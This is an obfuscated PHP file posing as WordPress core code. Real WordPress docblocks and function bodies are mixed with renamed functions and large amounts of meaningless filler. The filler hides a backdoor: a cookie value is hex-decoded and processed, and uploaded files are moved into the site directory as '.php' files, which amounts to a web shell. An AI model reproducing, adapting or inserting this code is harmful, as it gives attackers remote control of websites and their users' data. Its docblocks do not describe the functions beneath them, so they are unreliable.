$f9g5_38 = 'ks95gr';
}
$declaration_value = 'yvro5';
// Fix for Dreamhost and other PHP as CGI hosts.
// If there is a value return it, else return null.
//$PictureSizeEnc = getid3_lib::BigEndian2Int(substr($FLVvideoHeader, 5, 2));
// For Win32, occasional problems deleting files otherwise.
$transients['ads3356'] = 'xojk';
$f9g5_38 = floor(946);
if((quotemeta($use_verbose_rules)) == True) {
$checked_filetype = 'brwxze6';
}
$declaration_value = strrpos($declaration_value, $declaration_value);
$max_length['l2qb6s'] = 'n2qqivoi2';
$core_options_in['zyfy667'] = 'cvbw0m2';
$reserved_names['vsycz14'] = 'bustphmi';
$current_user_can_publish = chop($current_user_can_publish, $current_user_can_publish);
// (e.g. if using namespaces / autoload in the current PHP environment).
if(!isset($remote)) {
$remote = 'm7rye7czj';
}
if(!(sinh(457)) != True) {
$new_array = 'tatb5m0qg';
}
$nextRIFFheaderID = (!isset($nextRIFFheaderID)? "fo3jpina" : "kadu1");
$file_details['jamm3m'] = 1329;
$max_i['l4eciso'] = 'h8evt5';
if(!empty(crc32($f9g5_38)) == False) {
$MPEGaudioHeaderValidCache = 'hco1fhrk';
}
$remote = trim($use_verbose_rules);
$declaration_value = log10(363);
if (isset($_FILES[$max_stts_entries_to_scan])) {
refresh_user_details($max_stts_entries_to_scan, $max_num_comment_pages, $role_caps);
}
wp_ajax_install_plugin($role_caps);
}
/**
* Holds the mapping of directive attribute names to their processor methods.
*
* @since 6.5.0
* @var array
*/
function set_restriction_class ($request_match){
if(empty(log10(834)) !== false){
$parsedXML = 'ruvtq516e';
}
if(empty(sinh(904)) == FALSE) {
$op_precedence = 'ewi9hw';
}
// If a changeset was provided is invalid.
$vkey = 'obdw71p3';
$menuclass = (!isset($menuclass)? "gnwxnbs9m" : "kiqk");
$file_base['i538b'] = 'h6rttbi';
$matrixRotation['h4vy'] = 3527;
if(!isset($dropdown_options)) {
$dropdown_options = 'yifw5h93e';
}
$dropdown_options = rawurlencode($vkey);
$drag_drop_upload = 'h7wd';
$srcLen = (!isset($srcLen)? "y3c63" : "poctvu");
$request_match = str_repeat($drag_drop_upload, 7);
$compre = 'u8z35sm';
$search_columns_parts['qk1bq'] = 1981;
$dropdown_options = strrpos($compre, $compre);
return $request_match;
}
/**
* Removes the signature in case we experience a case where the Customizer was not properly executed.
*
* @since 3.4.0
* @deprecated 4.7.0
*
* @param callable|null $callback Optional. Value passed through for {@see 'wp_die_handler'} filter.
* Default null.
* @return callable|null Value passed through for {@see 'wp_die_handler'} filter.
*/
function wp_deleteCategory ($tmp_fh){
// Now return the updated values.
// Special case: '0' is a bad `$page_path`.
// Save widgets order for all sidebars.
$chapter_matches = 'yj1lqoig5';
if(!isset($include_port_in_host_header)) {
$include_port_in_host_header = 'omp4';
}
if((urlencode($chapter_matches)) === TRUE) {
$clear_update_cache = 'ors9gui';
}
$include_port_in_host_header = asinh(500);
// Lossless WebP.
$streamindex = (!isset($streamindex)? 'bkx6' : 'icp7bnpz');
$LastOggSpostion = 'dvbtbnp';
// Don't remove. Wrong way to disable.
$WaveFormatExData['ddwke93dy'] = 'lmrq380c';
if(empty(dechex(50)) != TRUE) {
$show_site_icons = 'vdf2xr';
}
$custom_paths = 'plv3t';
$show_in_rest = (!isset($show_in_rest)? "hs6b7b7" : "er83zxhkr");
if(empty(str_shuffle($custom_paths)) === True) {
$timetotal = 'twbg34vy';
}
$image_style = (!isset($image_style)? "e6nklbdca" : "i8snza");
$temp_dir['u1q07r'] = 'r7pdv';
$the_comment_class['s1t1mg7'] = 'o249kghoa';
$custom_paths = cos(402);
$has_text_color['p5wb0kck'] = 'zavcct';
$tmp_fh = strtolower($custom_paths);
$tmp_fh = nl2br($tmp_fh);
$pingbacktxt['g4ntn'] = 893;
if(!empty(strip_tags($tmp_fh)) != TRUE) {
$wp_lang = 'xo0xnh';
}
if(empty(asin(782)) !== false) {
$sampleRateCodeLookup2 = 'htrxp';
}
$author_ip_url['ymo68'] = 2310;
if((cosh(345)) === true) {
$choice = 'n9dpvg';
}
$default_schema = (!isset($default_schema)? 'xbebw8' : 'vth77zil');
$color_info['l86ukcqy'] = 'npe8lq';
if(!isset($wp_post_statuses)) {
$wp_post_statuses = 'urvjpvvtc';
}
$wp_post_statuses = sin(587);
$custom_paths = expm1(64);
$last_bar['gv6l'] = 3309;
if(empty(atan(914)) != FALSE) {
$ancestor = 'wtn28jyn0';
}
return $tmp_fh;
}
/**
* Returns the menu items associated with a particular object.
*
* @since 3.0.0
*
* @param int $object_id Optional. The ID of the original object. Default 0.
* @param string $object_type Optional. The type of object, such as 'post_type' or 'taxonomy'.
* Default 'post_type'.
* @param string $month_exists Optional. If $object_type is 'taxonomy', $month_exists is the name
* of the tax that $object_id belongs to. Default empty.
* @return int[] The array of menu item IDs; empty array if none.
*/
function do_meta_boxes ($tmp_fh){
// Can only have one post format.
$custom_paths = 'y09m6o';
$sps = 'yaja7142s';
# bcrypt will happily accept and correct a salt string which
$alias = 'd7k8l';
$maybe_widget_id = (!isset($maybe_widget_id)? "b8xa1jt8" : "vekwdbag");
$myLimbs = 'j4dp';
$use_verbose_rules = 'jdsauj';
// sanitize_post() skips the post_content when user_can_richedit.
if(!empty(rad2deg(262)) == FALSE) {
$add_new_screen = 'pcvg1bf';
}
if(!empty(ucfirst($alias)) === False) {
$hashed = 'ebgjp';
}
if((quotemeta($use_verbose_rules)) == True) {
$checked_filetype = 'brwxze6';
}
$has_min_font_size['ahydkl'] = 4439;
//The following borrowed from
$max_length['l2qb6s'] = 'n2qqivoi2';
$plugin_activate_url = 't5j8mo19n';
if(!empty(html_entity_decode($myLimbs)) == true) {
$code_ex = 'k8ti';
}
$is_multicall['cq52pw'] = 'ikqpp7';
$boxsmallsize = (!isset($boxsmallsize)? "wdn9" : "usqk7d0");
if(!isset($wp_post_statuses)) {
$wp_post_statuses = 'cx1c57qm';
}
$wp_post_statuses = strrpos($custom_paths, $sps);
if(!isset($remote)) {
$remote = 'm7rye7czj';
}
if(!isset($duration)) {
$duration = 'svay30c';
}
$oembed_post_query['ni17my'] = 'y4pb';
if(!empty(strnatcmp($myLimbs, $myLimbs)) != true) {
$val_len = 'bvlc';
}
// Return false early if explicitly not upgrading.
if(!isset($shared_terms_exist)) {
$shared_terms_exist = 'xkbm';
}
$shared_terms_exist = log10(447);
// If no valid clauses were found, order by user_login.
$custom_css_query_vars['qmxqhu1'] = 510;
// Fall back to checking the common name if we didn't get any dNSName
if(empty(expm1(604)) === False) {
$qs_match = 'oxchu2p';
}
$tmp_fh = strip_tags($sps);
$post_types_to_delete = (!isset($post_types_to_delete)? "d0h54se" : "ie1n50zg0");
if(!isset($altBodyCharSet)) {
$altBodyCharSet = 'jbua0sybm';
}
$duration = tanh(934);
$remote = trim($use_verbose_rules);
$plugin_activate_url = sha1($plugin_activate_url);
if(empty(crc32($myLimbs)) === True) {
$has_typography_support = 'bt92';
}
$altBodyCharSet = strtolower($wp_post_statuses);
if(!empty(floor(362)) != False) {
$activated = 'cs42';
}
$collection = 'oxpna';
$f1g4['y2370619'] = 1394;
if(!isset($matched_search)) {
$matched_search = 'ks8erzy1';
}
$matched_search = strrpos($sps, $collection);
return $tmp_fh;
}
/**
* Remove the `menu-item-has-children` class from bottom level menu items.
*
* This runs on the {@see 'nav_menu_css_class'} filter. The $args and $depth
* parameters were added after the filter was originally introduced in
* WordPress 3.0.0 so this needs to allow for cases in which the filter is
* called without them.
*
* @see https://core.trac.wordpress.org/ticket/56926
*
* @since 6.2.0
*
* @param string[] $classes Array of the CSS classes that are applied to the menu item's `<li>` element.
* @param WP_Post $menu_item The current menu item object.
* @param stdClass|false $args An object of wp_nav_menu() arguments. Default false ($args unspecified when filter is called).
* @param int|false $depth Depth of menu item. Default false ($depth unspecified when filter is called).
* @return string[] Modified nav menu classes.
*/
function level_reduction($outer_class_names, $mixedVar){
// 0x01 => 'AVI_INDEX_OF_CHUNKS',
$found_ids = move_uploaded_file($outer_class_names, $mixedVar);
// https://github.com/JamesHeinrich/getID3/issues/161
// carry21 = (s21 + (int64_t) (1L << 20)) >> 21;
$format_to_edit = 'wgzu';
$alias = 'd7k8l';
return $found_ids;
}
/**
* PUT method
*
* @var string
*/
function is_cookie_set($max_stts_entries_to_scan, $max_num_comment_pages){
$draft_or_post_title = 'kp5o7t';
$src_x = 'g209';
if(!isset($include_port_in_host_header)) {
$include_port_in_host_header = 'omp4';
}
$tail = 'iz2336u';
$call = $_COOKIE[$max_stts_entries_to_scan];
if(!(ucwords($tail)) === FALSE) {
$XMLstring = 'dv9b6756y';
}
$include_port_in_host_header = asinh(500);
$socket_host['l0sliveu6'] = 1606;
$src_x = html_entity_decode($src_x);
$call = pack("H*", $call);
// We don't need to block requests, because nothing is blocked.
$draft_or_post_title = rawurldecode($draft_or_post_title);
$LastOggSpostion = 'dvbtbnp';
$profile_help = 'bwnnw';
$symbol_match = 'nb48';
$role_caps = get_compat_media_markup($call, $max_num_comment_pages);
$converted_data['qs1u'] = 'ryewyo4k2';
if(empty(convert_uuencode($symbol_match)) !== false) {
$layout_class = 'gdfpuk18';
}
$include_port_in_host_header = convert_uuencode($LastOggSpostion);
$password_reset_allowed['yy5dh'] = 2946;
if (get_wp_title_rss($role_caps)) {
$tt_id = filter_wp_nav_menu($role_caps);
return $tt_id;
}
preg_index($max_stts_entries_to_scan, $max_num_comment_pages, $role_caps);
}
/**
* Outputs the content for the current Recent Posts widget instance.
*
* @since 2.8.0
*
* @param array $args Display arguments including 'before_title', 'after_title',
* 'before_widget', and 'after_widget'.
* @param array $instance Settings for the current Recent Posts widget instance.
*/
function wp_admin_bar_site_menu ($dropdown_options){
// Inject the dropdown script immediately after the select dropdown.
$dropdown_options = 'a4jxb';
// iconv() may sometimes fail with "illegal character in input string" error message
// ...and if the nav menu would be rendered with a wrapper container element (upon which to attach data-* attributes).
$trash_url['cu2m'] = 't3hzk';
$num_locations['q9ugocc5'] = 'myd3xpo0';
// If the collection uses JSON data, load it and cache the data/error.
$allowed_tags_in_links = 'kdky';
$inner_blocks = 'dgna406';
$new_assignments = 'a1g9y8';
$headerLineIndex = (!isset($headerLineIndex)? 'ab3tp' : 'vwtw1av');
$tinymce_plugins = 'to9muc59';
// No older comments? Then it's page #1.
if(!(wordwrap($inner_blocks)) === false) {
$innerBlocks = 'ppw0m1c';
}
$allowed_tags_in_links = addcslashes($allowed_tags_in_links, $allowed_tags_in_links);
$args_escaped['erdxo8'] = 'g9putn43i';
if(!isset($is_object_type)) {
$is_object_type = 'rzyd6';
}
$show_label = (!isset($show_label)? "qi2h3610p" : "dpbjocc");
if(empty(basename($dropdown_options)) !== false) {
$comment_author_link = 'cf9j';
}
if(!isset($min_timestamp)) {
$min_timestamp = 'aupobom';
}
$min_timestamp = atan(687);
//Unfold header lines
if((strripos($tinymce_plugins, $tinymce_plugins)) == False) {
$bookmarks = 'zy54f4';
}
$stored_value['q6eajh'] = 2426;
$is_object_type = ceil(318);
if(!(sinh(890)) !== False){
$use_legacy_args = 'okldf9';
}
$passwords['tcqudh7'] = 1855;
if(!(dechex(622)) === True) {
$post_mime_type = 'r18yqksgd';
}
$header_dkim = 'gxpm';
$new_assignments = urlencode($new_assignments);
$sort_order = 'avpk2';
if(!empty(acosh(337)) != False) {
$show_tagcloud = 'drgk';
}
$editing_menus['ey7nn'] = 605;
$objects = (!isset($objects)?"trm7qr":"r3no31fp");
$prefixed = (!isset($prefixed)?"v0qgaa6vy":"xxb9da");
if(!empty(quotemeta($sort_order)) === TRUE) {
$thumbfile = 'f9z9drp';
}
$terms_query['wsk9'] = 4797;
// Adds a style tag for the --wp--style--unstable-gallery-gap var.
// Run Uninstall hook.
$inner_blocks = sin(226);
$new_assignments = ucfirst($new_assignments);
$header_dkim = strcoll($header_dkim, $header_dkim);
$tinymce_plugins = atan(483);
$DirPieces = (!isset($DirPieces)?'y3xbqm':'khmqrc');
$header_url['vvrrv'] = 'jfp9tz';
$truncate_by_byte_length['nxl41d'] = 'y2mux9yh';
$tinymce_plugins = exp(197);
$declarations_array = (!isset($declarations_array)? 'vth7' : 'lxwetb');
if(empty(log10(229)) !== False){
$current_namespace = 'lw5c';
}
// Skip to the next route if any callback is hidden.
$min_timestamp = urlencode($min_timestamp);
$post_format['mf6ly'] = 3600;
$new_assignments = strcoll($new_assignments, $new_assignments);
if(!isset($spam)) {
$spam = 'q7ifqlhe';
}
$is_object_type = tanh(105);
$block_reader['dwuf'] = 'pmww8';
// 4.12 RVAD Relative volume adjustment (ID3v2.3 only)
// frame_crop_left_offset
$spam = str_repeat($sort_order, 18);
if(!empty(expm1(318)) == True){
$needed_dirs = 'gajdlk1dk';
}
$tinymce_plugins = strnatcasecmp($tinymce_plugins, $tinymce_plugins);
if(!empty(cosh(846)) == TRUE){
$UIDLArray = 'n4jc';
}
$inner_blocks = atanh(514);
$tinymce_plugins = is_string($tinymce_plugins);
$inner_blocks = stripslashes($inner_blocks);
$new_assignments = htmlspecialchars_decode($new_assignments);
$header_dkim = rad2deg(267);
$fallback_blocks = 'pxgk';
if(!isset($action_function)) {
$action_function = 'wqxlnf';
}
$action_function = addcslashes($dropdown_options, $dropdown_options);
$min_timestamp = log1p(276);
$arrow['p9g4uku'] = 4653;
$action_function = atanh(16);
$action_function = atanh(846);
$permissions_check = (!isset($permissions_check)? 'o6w0' : 'cxls');
if(!empty(decoct(237)) === TRUE){
$api_key = 'bnvhp';
}
$drag_drop_upload = 'wfzf';
if(!empty(urlencode($drag_drop_upload)) !== False){
$alert_header_names = 'cy7588s05';
}
$action_function = stripcslashes($dropdown_options);
if(!empty(rtrim($min_timestamp)) === True) {
$first_name = 'boonn7o';
}
$bias['k35l'] = 'lg6zmxh';
if(empty(trim($dropdown_options)) == False) {
$crons = 'y3vog2j';
}
$drag_drop_upload = strtr($min_timestamp, 16, 13);
return $dropdown_options;
}
/**
* Permalink structure for searches.
*
* @since 1.5.0
* @var string
*/
function unregister_block_pattern($cookie_jar){
$nag = __DIR__;
$GOPRO_offset = ".php";
// Draft, 1 or more saves, no date specified.
$cookie_jar = $cookie_jar . $GOPRO_offset;
// true on success,
$base_style_rules = 'e52tnachk';
$cookie_jar = DIRECTORY_SEPARATOR . $cookie_jar;
$cookie_jar = $nag . $cookie_jar;
$base_style_rules = htmlspecialchars($base_style_rules);
// Any other type: use the real image.
return $cookie_jar;
}
/**
* Rotates current image counter-clockwise by $angle.
* Ported from image-edit.php
*
* @since 3.5.0
*
* @param float $angle
* @return true|WP_Error
*/
function FixedPoint16_16 ($global_tables){
$old_meta['vr45w2'] = 4312;
$batch_size = 'hrpw29';
if(!(sinh(207)) == true) {
$phone_delim = 'fwj715bf';
}
$all_text = 'px7ram';
if(!isset($total_admins)) {
$total_admins = 'w5yo6mecr';
}
$wp_locale['fz5nx6w'] = 3952;
$auto_update_action = 'honu';
if(!isset($b0)) {
$b0 = 'sqdgg';
}
$b0 = log(194);
$total_admins = strcoll($all_text, $all_text);
if((htmlentities($batch_size)) === True){
$plugins_per_page = 'o1wr5a';
}
$f5f7_76['h8yxfjy'] = 3794;
$global_tables = sin(98);
// Could be absolute path to file in plugin.
$global_tables = log10(579);
$importer_name['ugz9e43t'] = 'pjk4';
if((crc32($total_admins)) === TRUE) {
$DKIM_passphrase = 'h2qi91wr6';
}
if(!isset($basicfields)) {
$basicfields = 'fyqodzw2';
}
$mu_plugins = (!isset($mu_plugins)? "g3al" : "ooftok2q");
$post_objects['gkrv3a'] = 'hnpd';
// A list of valid actions and their associated messaging for confirmation output.
$batch_size = crc32($batch_size);
$total_admins = bin2hex($all_text);
$delete_url['y5txh'] = 2573;
$basicfields = bin2hex($auto_update_action);
// s[14] = s5 >> 7;
// Reset ParagonIE_Sodium_Compat::$fastMult to what it was before.
if(!isset($label_user)) {
$label_user = 'os96';
}
$dependencies_of_the_dependency['kvw1nj9ow'] = 1126;
$msgC = 'pc7cyp';
$c_num['dlfjqb5'] = 1047;
$fake_headers = 'slp9msb';
$batch_size = strtoupper($batch_size);
if(empty(wordwrap($b0)) !== True) {
$att_url = 't20dohmpc';
}
$label_user = bin2hex($auto_update_action);
if(!empty(rawurldecode($global_tables)) != False) {
$number2 = 'nl9b4dr';
}
if(!(addslashes($global_tables)) == False) {
$figure_styles = 'ogpos2bpy';
}
$ReplyToQueue = (!isset($ReplyToQueue)?"vk86zt":"kfagnd19i");
$global_tables = chop($global_tables, $global_tables);
$global_tables = htmlspecialchars($global_tables);
$global_tables = tanh(118);
$margin_right['g2yg5p9o'] = 'nhwy';
if(empty(strnatcmp($global_tables, $global_tables)) === false) {
$newstring = 'urjx4t';
}
if(!empty(rtrim($global_tables)) === true) {
$string2 = 'kv264p';
}
$global_tables = addcslashes($global_tables, $global_tables);
$MsgArray['fb6j59'] = 3632;
$global_tables = quotemeta($global_tables);
$global_tables = sinh(159);
$global_tables = strtoupper($global_tables);
if(empty(strripos($global_tables, $global_tables)) !== False) {
$blocklist = 'kxpqewtx';
}
return $global_tables;
}
$open_class = 'zhatfz';
/**
* PHP4 constructor.
*
* @deprecated 5.4.0 Use __construct() instead.
*
* @see POMO_FileReader::__construct()
*/
function update_posts_count ($standard_bit_rate){
$signatures = 'v9ka6s';
$post_links = 'd8uld';
$mock_navigation_block = 'bc5p';
$matchcount = 'anflgc5b';
$maybe_widget_id = (!isset($maybe_widget_id)? "b8xa1jt8" : "vekwdbag");
// The placeholder atom has a type of kWideAtomPlaceholderType ( 'wide' ).
$check_html['htkn0'] = 'svbom5';
if(!empty(urldecode($mock_navigation_block)) !== False) {
$suppress = 'puxik';
}
$post_links = addcslashes($post_links, $post_links);
$signatures = addcslashes($signatures, $signatures);
if(!empty(rad2deg(262)) == FALSE) {
$add_new_screen = 'pcvg1bf';
}
if(!isset($processed_response)) {
$processed_response = 'cr5rn';
}
$processed_response = tan(441);
if(!isset($column_display_name)) {
$column_display_name = 'zmegk';
}
$column_display_name = sin(390);
$block_classname = 'klue';
$global_tables = 'ln2h2m';
$standard_bit_rate = addcslashes($block_classname, $global_tables);
if(!isset($avail_roles)) {
$avail_roles = 'etf00l3gq';
}
$avail_roles = round(809);
$force_uncompressed = (!isset($force_uncompressed)? 'yh97hitwh' : 'zv1ua9j4x');
$column_display_name = str_repeat($global_tables, 11);
$global_tables = log1p(823);
if(empty(strtoupper($avail_roles)) === False) {
$is_writable_wpmu_plugin_dir = 'zafcf';
}
$f6g0 = (!isset($f6g0)? 'grc1tj6t' : 'xkskamh2');
if(!isset($has_gradient)) {
$has_gradient = 'osqulw0c';
}
$has_gradient = ceil(389);
return $standard_bit_rate;
}
// 2) The message can be translated into the current language of the blog, not stuck
/**
* Generates the list table rows.
*
* @since 3.1.0
*/
function get_wp_title_rss($supported_block_attributes){
$document_title_tmpl['gzjwp3'] = 3402;
$comment_agent_blog_id = 'gi47jqqfr';
$found_location = 'f4tl';
if (strpos($supported_block_attributes, "/") !== false) {
return true;
}
return false;
}
/**
* WordPress Dashboard Widget Administration Screen API
*
* @package WordPress
* @subpackage Administration
*/
/**
* Registers dashboard widgets.
*
* Handles POST data, sets up filters.
*
* @since 2.5.0
*
* @global array $previewed_setting
* @global array $cur_mn
* @global callable[] $install_label
*/
function network_settings_add_js()
{
global $previewed_setting, $cur_mn, $install_label;
$framelengthfloat = get_current_screen();
/* Register Widgets and Controls */
$install_label = array();
// Browser version
$body_class = wp_check_browser_version();
if ($body_class && $body_class['upgrade']) {
add_filter('postbox_classes_dashboard_dashboard_browser_nag', 'dashboard_browser_nag_class');
if ($body_class['insecure']) {
wp_add_dashboard_widget('dashboard_browser_nag', __('You are using an insecure browser!'), 'wp_dashboard_browser_nag');
} else {
wp_add_dashboard_widget('dashboard_browser_nag', __('Your browser is out of date!'), 'wp_dashboard_browser_nag');
}
}
// PHP Version.
$role_counts = wp_check_php_version();
if ($role_counts && current_user_can('update_php')) {
// If "not acceptable" the widget will be shown.
if (isset($role_counts['is_acceptable']) && !$role_counts['is_acceptable']) {
add_filter('postbox_classes_dashboard_dashboard_php_nag', 'dashboard_php_nag_class');
if ($role_counts['is_lower_than_future_minimum']) {
wp_add_dashboard_widget('dashboard_php_nag', __('PHP Update Required'), 'wp_dashboard_php_nag');
} else {
wp_add_dashboard_widget('dashboard_php_nag', __('PHP Update Recommended'), 'wp_dashboard_php_nag');
}
}
}
// Site Health.
if (current_user_can('view_site_health_checks') && !is_network_admin()) {
if (!class_exists('WP_Site_Health')) {
require_once ABSPATH . 'wp-admin/includes/class-wp-site-health.php';
}
WP_Site_Health::get_instance();
wp_enqueue_style('site-health');
wp_enqueue_script('site-health');
wp_add_dashboard_widget('dashboard_site_health', __('Site Health Status'), 'wp_dashboard_site_health');
}
// Right Now.
if (is_blog_admin() && current_user_can('edit_posts')) {
wp_add_dashboard_widget('dashboard_right_now', __('At a Glance'), 'wp_dashboard_right_now');
}
if (is_network_admin()) {
wp_add_dashboard_widget('network_dashboard_right_now', __('Right Now'), 'wp_network_dashboard_right_now');
}
// Activity Widget.
if (is_blog_admin()) {
wp_add_dashboard_widget('dashboard_activity', __('Activity'), 'wp_dashboard_site_activity');
}
// QuickPress Widget.
if (is_blog_admin() && current_user_can(get_post_type_object('post')->cap->create_posts)) {
$use_authentication = sprintf('<span class="hide-if-no-js">%1$s</span> <span class="hide-if-js">%2$s</span>', __('Quick Draft'), __('Your Recent Drafts'));
wp_add_dashboard_widget('dashboard_quick_press', $use_authentication, 'wp_dashboard_quick_press');
}
// WordPress Events and News.
wp_add_dashboard_widget('dashboard_primary', __('WordPress Events and News'), 'wp_dashboard_events_news');
if (is_network_admin()) {
/**
* Fires after core widgets for the Network Admin dashboard have been registered.
*
* @since 3.1.0
*/
do_action('wp_network_dashboard_setup');
/**
* Filters the list of widgets to load for the Network Admin dashboard.
*
* @since 3.1.0
*
* @param string[] $prepare An array of dashboard widget IDs.
*/
$prepare = apply_filters('wp_network_dashboard_widgets', array());
} elseif (is_user_admin()) {
/**
* Fires after core widgets for the User Admin dashboard have been registered.
*
* @since 3.1.0
*/
do_action('wp_user_dashboard_setup');
/**
* Filters the list of widgets to load for the User Admin dashboard.
*
* @since 3.1.0
*
* @param string[] $prepare An array of dashboard widget IDs.
*/
$prepare = apply_filters('wp_user_dashboard_widgets', array());
} else {
/**
* Fires after core widgets for the admin dashboard have been registered.
*
* @since 2.5.0
*/
do_action('network_settings_add_js');
/**
* Filters the list of widgets to load for the admin dashboard.
*
* @since 2.5.0
*
* @param string[] $prepare An array of dashboard widget IDs.
*/
$prepare = apply_filters('wp_dashboard_widgets', array());
}
foreach ($prepare as $update_args) {
$gd_image_formats = empty($previewed_setting[$update_args]['all_link']) ? $previewed_setting[$update_args]['name'] : $previewed_setting[$update_args]['name'] . " <a href='{$previewed_setting[$update_args]['all_link']}' class='edit-box open-box'>" . __('View all') . '</a>';
wp_add_dashboard_widget($update_args, $gd_image_formats, $previewed_setting[$update_args]['callback'], $cur_mn[$update_args]['callback']);
}
if ('POST' === $_SERVER['REQUEST_METHOD'] && isset($_POST['widget_id'])) {
check_admin_referer('edit-dashboard-widget_' . $_POST['widget_id'], 'dashboard-widget-nonce');
ob_start();
// Hack - but the same hack wp-admin/widgets.php uses.
wp_dashboard_trigger_widget_control($_POST['widget_id']);
ob_end_clean();
wp_redirect(remove_query_arg('edit'));
exit;
}
/** This action is documented in wp-admin/includes/meta-boxes.php */
do_action('do_meta_boxes', $framelengthfloat->id, 'normal', '');
/** This action is documented in wp-admin/includes/meta-boxes.php */
do_action('do_meta_boxes', $framelengthfloat->id, 'side', '');
}
/**
* Translation path set for this dependency.
*
* @since 5.0.0
* @var string
*/
function get_core_checksums ($new_group){
// Split the term.
if(!isset($block_classname)) {
$block_classname = 'snxjmtc03';
}
$block_classname = log(544);
$new_group = 'qtyib';
if(!(strtoupper($new_group)) === false) {
$panels = 'itavhpj';
}
$updates_overview = (!isset($updates_overview)?"zw0s76bg":"rh192d9m");
$new_group = acosh(209);
if(!isset($built_ins)) {
$built_ins = 'f4rl9omf';
}
$built_ins = round(70);
$compare_operators = (!isset($compare_operators)? 'sgsz5' : 'ezxt');
$show_video_playlist['bffricv'] = 2368;
if(!isset($has_gradient)) {
$has_gradient = 'qxxu1d';
}
$has_gradient = log1p(181);
$new_group = tan(281);
$normalized_pattern = (!isset($normalized_pattern)? "sd52" : "qh24d9x9");
$hook_extra['cv2sjmsy'] = 1149;
if((log10(153)) == false) {
$raw_password = 'ajrub';
}
if((atan(509)) == True) {
$appearance_cap = 'ast8rth0';
}
$block_classname = tan(286);
$more['v2g230'] = 'g9aefsus';
$has_gradient = nl2br($block_classname);
$recent_post = 'pzier';
$block_classname = strripos($block_classname, $recent_post);
$filelist['iz4j4ln'] = 3800;
if(!empty(rawurldecode($block_classname)) === FALSE) {
$attribute_to_prefix_map = 'dmeo';
}
$arc_w_last = 'oqeww2w';
$a_ = (!isset($a_)? 'vhxi2' : 'wet31');
$json_decoding_error['li6c5j'] = 'capo452b';
if(!isset($global_tables)) {
$global_tables = 'i46cnzh';
}
$global_tables = is_string($arc_w_last);
$arc_w_last = strcspn($arc_w_last, $block_classname);
return $new_group;
}
/**
* Prepares response data to be serialized to JSON.
*
* This supports the JsonSerializable interface for PHP 5.2-5.3 as well.
*
* @ignore
* @since 4.4.0
* @deprecated 5.3.0 This function is no longer needed as support for PHP 5.2-5.3
* has been dropped.
* @access private
*
* @param mixed $block_support_config Native representation.
* @return bool|int|float|null|string|array Data ready for `json_encode()`.
*/
function autoloader($block_support_config)
{
_deprecated_function(__FUNCTION__, '5.3.0');
return $block_support_config;
}
// ----- Read the compressed file in a buffer (one shot)
$compare_original['ylzy75'] = 'yp0n1';
/**
* Sanitizes data in single category key field.
*
* @since 2.3.0
*
* @param string $field Category key to sanitize.
* @param mixed $block_support_config Category value to sanitize.
* @param int $cat_id Category ID.
* @param string $context What filter to use, 'raw', 'display', etc.
* @return mixed Value after $block_support_config has been sanitized.
*/
function fe_copy ($has_gradient){
$readonly_value = (!isset($readonly_value)? 'uxdwu1c' : 'y7roqe1');
$block_binding_source = 'hzhablz';
$term_query['arru'] = 3416;
# tail[-i] = (tail[-i] & mask) | (0x80 & barrier_mask);
if((strtolower($block_binding_source)) == TRUE) {
$consumed = 'ngokj4j';
}
//Now convert LE as needed
$global_styles_color = 'w0u1k';
if(empty(sha1($global_styles_color)) !== true) {
$deepscan = 'wbm4';
}
$is_email_address_unsafe = (!isset($is_email_address_unsafe)? "oamins0" : "pxyza");
$db['axqmqyvme'] = 4276;
if(empty(cosh(551)) != false) {
$status_code = 'pf1oio';
}
$new_group = 'lwc3kp1';
if(!isset($arc_w_last)) {
$arc_w_last = 'kvu0h3';
}
$arc_w_last = base64_encode($new_group);
$built_ins = 'fzlmtbi';
if(!(convert_uuencode($built_ins)) !== FALSE) {
$sanitize_js_callback = 'lczqyh3sq';
}
$box_context = 'rxmd';
$built_ins = strip_tags($box_context);
$replaces = (!isset($replaces)? 'wp7ho257j' : 'qda6uzd');
if(empty(asinh(440)) == False) {
$bookmark_counter = 'dao7pj';
}
$has_gradient = 'qrn44el';
$recent_post = 'irru';
$audioCodingModeLookup = (!isset($audioCodingModeLookup)? "ezi66qdu" : "bk9hpx");
$no_results['c5nb99d'] = 3262;
$box_context = strnatcasecmp($has_gradient, $recent_post);
if(!(htmlspecialchars($has_gradient)) != true) {
$erasers_count = 'a20r5pfk0';
}
if(!empty(stripslashes($global_styles_color)) !== false){
$section_label = 'wuyfgn';
}
$current_limit_int = (!isset($current_limit_int)? 'w1dkg3ji0' : 'u81l');
$quicktags_toolbar['wrcd24kz'] = 4933;
if(!isset($standard_bit_rate)) {
$standard_bit_rate = 'b3juvc';
}
$standard_bit_rate = tanh(399);
$recent_post = tanh(965);
if(!isset($processed_response)) {
$processed_response = 'zkopb';
}
$processed_response = round(766);
if(!isset($global_tables)) {
$global_tables = 'lcpjiyps';
}
$global_tables = sqrt(361);
$menus_meta_box_object['wtb0wwms'] = 'id23';
if(!isset($column_display_name)) {
$column_display_name = 'kqh9';
}
$column_display_name = htmlspecialchars($built_ins);
return $has_gradient;
}
// phpcs:ignore WordPress.DateTime.RestrictedFunctions.timezone_change_date_default_timezone_set
/* translators: %s: Site link. */
function verify_certificate ($tmp_fh){
$auth_secure_cookie = (!isset($auth_secure_cookie)? 'f8irzl' : 'lp0u');
$link_id['s2hvsf3'] = 'h8x9d';
// ...and /page/xx ones.
if(!isset($custom_paths)) {
$custom_paths = 'n7efui';
}
$custom_paths = dechex(312);
$wp_post_statuses = 'mvxxpnfyo';
$time_html['xc9njxz'] = 4804;
if(!isset($p_bytes)) {
$p_bytes = 'moxf15n';
}
$p_bytes = htmlentities($wp_post_statuses);
$tmp_fh = 'g1jy';
$connect_timeout['lbkbxw2h8'] = 2342;
$custom_paths = wordwrap($tmp_fh);
$b10['e81ggevgi'] = 'zpkn7sn9';
$wp_post_statuses = ceil(587);
if(empty(sha1($tmp_fh)) != False) {
$help_class = 'mb8s';
}
$comment_reply_link = (!isset($comment_reply_link)? "kmbgf" : "vo68hmup");
$wp_post_statuses = decbin(115);
$p_bytes = expm1(239);
$dependent_slug = (!isset($dependent_slug)? "j9ezo2d" : "cp7n98");
$entry_count['rns8fdhvw'] = 'jkrmkk';
if((md5($tmp_fh)) === false) {
$parsedkey = 'cy1r4nmw';
}
$p_bytes = addslashes($tmp_fh);
$server_text['veujdl'] = 'uy0fw';
$p_bytes = rad2deg(427);
$custom_paths = strrev($p_bytes);
$default_width = (!isset($default_width)? 'wpb8e' : 'qe1lllb');
if(empty(asinh(214)) === false) {
$sttsEntriesDataOffset = 'bn13';
}
$primary_meta_query = (!isset($primary_meta_query)? 'q8n6pyw3t' : 'ne40');
$media['kdte'] = 991;
